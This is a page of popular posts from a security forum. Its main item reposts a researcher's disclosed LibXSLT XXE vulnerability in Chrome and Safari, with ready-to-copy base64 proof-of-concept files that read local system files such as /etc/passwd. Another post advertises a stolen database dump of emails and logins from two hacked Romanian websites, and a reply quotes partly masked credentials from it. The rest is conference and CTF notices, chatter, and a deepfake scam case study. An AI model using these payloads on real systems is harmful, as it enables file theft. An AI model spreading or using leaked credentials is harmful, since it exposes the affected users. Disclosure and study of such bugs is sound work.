Leaderboard
Popular Content
Showing content with the highest reputation since 08/15/24 in all areas
-
A year ago, I wondered what a malicious page with disabled JavaScript could do. I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled? Since I was too lazy to read the documentation, I started generating examples using ChatGPT. XSL The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data. In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example. system-properties.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet href="system-properties.xsl" type="text/xsl"?> <root/> system-properties.xsl <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <p> Version: <xsl:value-of select="system-property('xsl:version')" /> <br /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </p> </xsl:template> </xsl:stylesheet> Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome: The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications. The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios. get-location.xml <?xml-stylesheet href="get-location.xsl" type="text/xsl"?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test> <getLocation test="ent"/> </test> get-location.xsl <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > <xsl:output method="html"/> <xsl:template match="getLocation"> <input type="text" value="{unparsed-entity-uri(@test)}" /> </xsl:template> </xsl:stylesheet> Here is what you should see after uploading this code to your web server: All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”. XSL and Remote Content Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML. I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it. XML External Entities Since XSL is XML-based, usage of XML External Entities should be the first option. <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test>&xxe;</test> XInclude XInclude is an XML add-on that’s described in a W3C Recommendation from November 15, 2006. <?xml version="1.0"?> <test xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/passwd"/> </test> XSL‘s <xsl:import> and <xsl:include> tags These tags can be used to load files as XSL stylesheets, according to ChatGPT. <?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:include href="file:///etc/passwd"/> <xsl:import href="file:///etc/passwd"/> </xsl:stylesheet> XSL’s document() function XSL’s document() function can be used for loading files as XML documents. <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:copy-of select="document('file:///etc/passwd')"/> </xsl:template> </xsl:stylesheet> XXE Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol. When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android! iOS + Safari Android + Chrome Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions. There was no chance that this wasn’t a vulnerability! Here is a photo of my Smart TV, where the file reading works as well: I compiled a table summarizing all my tests: The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user. Other Tests I have tested some applications that use LibXSLT and don’t have sandboxes. App Result PHP Applications that allow control over XSLTProcessor::importStylesheet data can be affected. XMLSEC The document() function did not allow http(s):// and data: URLs. Oracle The document() function did not allow http(s):// and data: URLs. PostgreSQL The document() function did not allow http(s):// and data: URLs. The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT. According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack. POCs You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later. First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them: The result of opening the xxe_all_tests/test.html page in an outdated Chrome Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights. As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding: Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article. poc.svg <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE svg [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <svg location="ent" /> poc.xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> <!DOCTYPE test [ <!ENTITY ent SYSTEM "?" NDATA aaa> ]> <test1 location="ent"/> poc.html <html> <head> <title>LibXSLT document() XXE tests</title> </head> <body> SVG<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlsZEdNdmNHRnpjM2RrSlRJeUpUTkZKVEl3SlRWRUpUTkZKVEJCSlRORGVIaGxKVE5GSlRCQkpUSTJlSGhsSlROQ0pUQkJKVE5ESlRKR2VIaGxKVE5GSnlraUx6NEtQQzlrYVhZK0Nqd3ZabTl5WldsbmJrOWlhbVZqZEQ0S1BDOXpkbWMrQ2p3dmVITnNPblJsYlhCc1lYUmxQZ284TDNoemJEcHpkSGxzWlhOb1pXVjBQZz09Ij8+CjwhRE9DVFlQRSBzdmcgWyAgCiAgICA8IUVOVElUWSBlbnQgU1lTVEVNICI/IiBOREFUQSBhYWE+ICAgCl0+CjxzdmcgbG9jYXRpb249ImVudCIgLz4="></iframe><br/> SVG WIN<br/> <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2JXVjBhRzlrUFNKNGJXd2lMejRLUEhoemJEcDBaVzF3YkdGMFpTQnRZWFJqYUQwaUx5SStDanh6ZG1jZ2VHMXNibk05SW1oMGRIQTZMeTkzZDNjdWR6TXViM0puTHpJd01EQXZjM1puSWo0S1BHWnZjbVZwWjI1UFltcGxZM1FnZDJsa2RHZzlJak13TUNJZ2FHVnBaMmgwUFNJMk1EQWlQZ284WkdsMklIaHRiRzV6UFNKb2RIUndPaTh2ZDNkM0xuY3pMbTl5Wnk4eE9UazVMM2hvZEcxc0lqNEtUR2xpY21GeWVUb2dQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxibVJ2Y2ljcElpQXZQang0YzJ3NmRtRnNkV1V0YjJZZ2MyVnNaV04wUFNKemVYTjBaVzB0Y0hKdmNHVnlkSGtvSjNoemJEcDJaWEp6YVc5dUp5a2lJQzgrUEdKeUlDOCtJQXBNYjJOaGRHbHZiam9nUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluVnVjR0Z5YzJWa0xXVnVkR2wwZVMxMWNta29MeW92UUd4dlkyRjBhVzl1S1NJZ0x6NGdJRHhpY2k4K0NsaFRUQ0JrYjJOMWJXVnVkQ2dwSUZoWVJUb2dDang0YzJ3NlkyOXdlUzF2WmlBZ2MyVnNaV04wUFNKa2IyTjFiV1Z1ZENnblpHRjBZVG9zSlROREpUTkdlRzFzSlRJd2RtVnljMmx2YmlVelJDVXlNakV1TUNVeU1pVXlNR1Z1WTI5a2FXNW5KVE5FSlRJeVZWUkdMVGdsTWpJbE0wWWxNMFVsTUVFbE0wTWxNakZFVDBOVVdWQkZKVEl3ZUhobEpUSXdKVFZDSlRJd0pUTkRKVEl4UlU1VVNWUlpKVEl3ZUhobEpUSXdVMWxUVkVWTkpUSXdKVEl5Wm1sc1pUb3ZMeTlqT2k5M2FXNWtiM2R6TDNONWMzUmxiUzVwYm1rbE1qSWxNMFVsTWpBbE5VUWxNMFVsTUVFbE0wTjRlR1VsTTBVbE1FRWxNalo0ZUdVbE0wSWxNRUVsTTBNbE1rWjRlR1VsTTBVbktTSXZQZ284TDJScGRqNEtQQzltYjNKbGFXZHVUMkpxWldOMFBnbzhMM04yWno0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0MSBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiIC8+"></iframe><br/> XML<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/> XML WIN<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/> </body> ZIP archive for testing: libxslt.zip. The Bounty All findings were immediately reported to the vendors. Safari Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000. 💰 Chrome Google implemented the patch and enforced security for documents loaded by the XSL’s document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000. 💸 Links https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40415 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4357 https://issues.chromium.org/issues/40066577 Feel free to write your thoughts about the article on our X page. Follow @ptswarm so you don’t miss our future research and other publications. Source: https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/4 points
-
Hello komrads today's hacked romanian websites zoso.ro & arhiblog.ro FULL DB Dump from today. All emails from comments and all logins. Download here: You need to be a registered user to view this link! You need to comment "Thank You" after you log in!3 points
-
Scula-ne-ați traficul på sait 🤣2 points
-
O zi productiva pentru forum, una cu multe conturi noi inregistrate2 points
-
Join the largest cybersecurity conference from CEE November 28th-29th Palace of the Parliament | Bucharest, Romania https://def.camp/1 point
-
DefCamp Capture the Flag 2024 START DATE END DATE Friday, September 27, 2024 at 10:00 AM UTC Sunday, September 29, 2024 at 9:00 AM UTC EVENT OVERVIEW You have to be authenticated to be able to join this contest. 🚩 Mark Your Calendars! The DefCamp Capture the Flag (D-CTF) Qualification Phase is Locked and Loaded for 2024! 😱 Get ready to dive into the most electrifying and audacious security CTF competition in Central and Eastern Europe—DefCamp Capture The Flag (D-CTF)! This is where the sharpest hackers and IT masterminds come together to push their skills to the limit, battling it out with top CTF teams from around the globe. The mission? Secure a spot in the elite top 10 and ultimately conquer the D-CTF competition—or go down fighting! Since 2011, DefCamp Capture the Flag has been the ultimate battleground for over 10,000 players. This annual, multi-stage event is open to all, but remember one crucial rule—hack or be hacked! Event Highlights Brace yourselves for an adrenaline-packed adventure with around 10 beginner-friendly challenges and 15 more difficult tasks that will test even the most seasoned players. Format: Jeopardy Play Format: Team-only Genres: Crypto, Pwning, Reversing, Web, Forensics, Miscellaneous… Language: English Access: Open / Free for everyone Difficulty: Entry Level - Easy - Medium - Hard - Insane Website: D-CTF The Challenge Awaits Tackle a variety of challenges across multiple categories. Exploit system weaknesses, follow cryptic hints, and uncover hidden secrets. Each challenge holds a unique flag in the format CTF{sha256 random message}. Capture it, submit it on our platform, and rack up your points. CTF competitions are a thrilling mix of puzzles and challenges, including reverse-engineering, memory corruption, cryptography, web tech, and more. Solve them, capture the flag, and climb the leaderboard to victory! Detalii: https://dctf24-quals.cyber-edu.co/?tenant=cyberedu1 point
-
Teoretic se puteau recupera anumite franturi din conversatii daca nu a mai folosit telefonul respectiv de prin 2018-2019 si l-a lasat sa zaca printr-un sertar. Cel putin pe vremuri se puteau recupera bucati de conversatii. Dar da, datele sunt supra-supra-suprascrise daca a folosit acelasi device din 2017 si pana acum. De la whatsapp nu va primi nimic daca ii va contacta.1 point
-
nu sunt f multi prin arhiva. Sample : alinux:miha**** blog@zoso.ro:batma*** Asa hal de parole?1 point
-
1. Da, ft greu sa atragi speakeri faini intr-o tara din estul "vestului". Faptul ca e un numar relativ mare de participanti (pentru regiune), ajuta cat de cat. 2. Costa enorm un eveniment de genul asta (informatiile astea sunt publice). In fiecare an am redus din "influenta" sponsorilor pe prezentari, anul acesta de exemplu nu exista nici un pachet cu prezentari incluse, you have to apply la CFP. Vedem cum va fi 3. Din regiune vin destul de multi. PS: Daca cunosti vreun Admin de pe RST care vrea sa dea in vreun fel niste discounts, ma bag.1 point
-
1 point
-
Bro ignora tot ce am scris mai sus. Eram beat si mancam cacat. Cand am citit acum 5 minute ce am scris azi noapte mi-am dat doua palme. In schimb, sunt mandru de mine ca scriu foarte coerent cand sunt beat pula1 point
-
Studiu de caz: Operatiunea “DeepFake” Context In data de 7 august au fost retinuti in Chisinau 12 persoane intr-o ancheta desfasurata de autoritatile romane in colaborare cu cele din Republica Moldova. Cei 12 suspecti au fost arestati deoarece se considera ca ar fi inselat sute de romani si au obtinut un total estimat de 15 milioane de lei. Operațiunea a fost coordonată cu implicarea structurilor de drept din ambele țări, evidențiind colaborarea transfrontalieră în combaterea criminalității organizate și a noilor tipuri de infracțiuni care implică tehnologii avansate. Gruparea infractionala folosea tehnologia deepfake pentru a genera clipuri trucate cu personalitati mari din Romania in care acestia incurajau populatia sa investeasca in diferite escrocherii online. Despre gruparea “DeepFake” Conform cercetarilor mele, gruparea activeaza inca de la sfarsitul lui decembrie anul trecut(2023). Nu exista o data exacta insa pot estima undeva de la opt luni pana la un an de la momentul scrierii acestui studiu de caz. Gruparea are sedii fizice atat in Moldova cat si in Romania, de unde acestia apeleaza clientii. Conform moldova1.md “Persoanele reținute, cu vârste între 20 și 45 de ani, erau angajate de companii care implementau selecții riguroase, inclusiv teste de poligraf. Majoritatea bănuiților sunt tineri angajați în centre de apel, specialiști IT și agenți de vânzări, în timp ce alții aveau roluri de superiori sau administratori. Unele persoane și-au recunoscut vinovăția și cooperează cu autoritățile.” Din cateva apeluri purtate cu operatorii acestei grupari am inteles ca programul de lucru al angajatilor este de luni pana vineri. Majoritatea dintre acestia sunt oameni cu varste cuprinse intre 25-30 ani dar sunt si studenti cu o situatie financiara precara care nu stiu cu adevarat ce vand oamenilor. Cel mai probabil, acestia sunt recrutati de pe grupuri de Facebook si de pe platforme precum OLX. Cum functioneaza toata operatiunea Scam-ul incepe dindata ce utilizatorul de rand foloseste retele sociale precum: YouTube, Facebook, Instagram. Gruparea genereaza reclame de pe mai multe pagini de Facebook, Instagram chiar si YouTube. Din cercetarile mele, grupul foloseste persoane cunoscute din Romania pentru a ajunge mai usor la public, printre care regasim: Andreea Esca, Mugur Isarescu, Florin Zamfirescu, Ion Tiriac, Iancu Guda ruleaza mai multe scenarii, dar in acest document o sa investigam modul de operare a scenariului BRUA. Personal, am dat de reclama pe YouTube, unde Denise Rifai, prezentatoarea emisiunii “40 de intrebari” vorbea cu Florin Zamfirescu unde acesta afirma ca reuseste sa faca zeci de mii de lei prin intermediul investitiilor in BRUA. BRUA există, dar nu ca fond de investiții ci este magistrala de GAZ dintre Bulgaria-România-Ungaria-Austria și găsim informații pe site-urile oficiale ale statului. Utilizatorul care acceseaza pagina din reclama este redirectionat pe un domeniu unde site-ul rfi.fr/ro este clonat 1:1. Pe site este prezentat un articol unde se prezinta o conversatie intre Denise Rifai si invitatul Florin Zamfirescu. De exemplu, doua dintre domeniile folosite sunt dixycaa.com si fuwakumarofe.life La sfarsitul articolului se regaseste un link de redirect pentru a completa un formular cu: nume, mail si numar de telefon. Odata completat, un operator urmeaza sa se sune victima. Conversatia urmeaza intotdeauna acelasi curs, daca cumva clientul deraiaza cu o intrebare care nu este anticipata, operatorul ramane blocat, deseori oprind microfonul(probabil pentru a intreba colegii din incapere ce sa raspunda). Tonul este unul prietenos, operatorul este instruit sa se adapteze oricarui tip de comportament social. De asemenea, acesta este foarte sociabil, aproape ca un prieten(dar care vrea sa-ti fure banii). Dupa ce victima este convinsa si se stabileste o relatie de incredere minima, operatorul trimite pe WhatsApp un link catre un site web fals, care arata identic cu site-ul legitim din care iti poti retrage “câștigurile”. Dar, nu inainte sa efectuezi un transfer prin IBAN de minim 1250 RON pentru a-ti incepe ‘’investitia’’. Convorbirea se deruleaza astfel: Prezentarea operatorului si a 